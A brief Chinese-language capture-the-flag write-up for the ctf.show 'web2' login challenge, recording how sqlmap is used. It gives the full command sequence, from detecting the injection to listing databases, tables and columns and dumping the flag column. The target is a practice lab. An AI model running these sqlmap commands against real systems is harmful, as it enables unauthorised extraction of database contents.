题目:ctf.show
题目博客很久之前已经做过一次了,很简单,这次只是用它来记录一下sqlmap如何使用
首先进入题目,是一个登录界面,猜测是sql注入。
打开SQLmap,查询网站是否存在注入。
burp抓包,将http头部文件复制到sqlmap同一文件下
打开cmd,跳转到sqlmap指令下
输入指令python sqlmap.py -r 1.txt
-r后面是你存储http头部信息的文件(要给你的注入点添加*,在这个题目是在username添加)
可以看到SQLmap返回给我们当前网站存在延时注入和联合查询注入。
那么我们在后面的操作过程可以使用延时,也可以使用联合查询。
这里我直接使用SQLmap语句进行查询了。
输入python sqlmap.py -r 1.txt --dbs
--dbs意为查询当前用户下的所有数据库
可以看到所有的数据库的库名,因为当前题目的名字就叫web2,所以我们大胆猜测正确答案应该在web2这个库里面
接着查询web2库里面有哪些表
python sqlmap.py -r 1.txt -D web2 --tables
可以看到web2库下有两个表,其中一个表名位为flag,所以目标应该就在flag表下面的某一列
python sqlmap.py -r 1.txt -D web2 -T flag --columns
发现有一个flag列,查询flag列
python sqlmap.py -r 1.txt -D web2 -T flag -C flag --dump
dump为获取当前列里面的数据
成功获取到了flag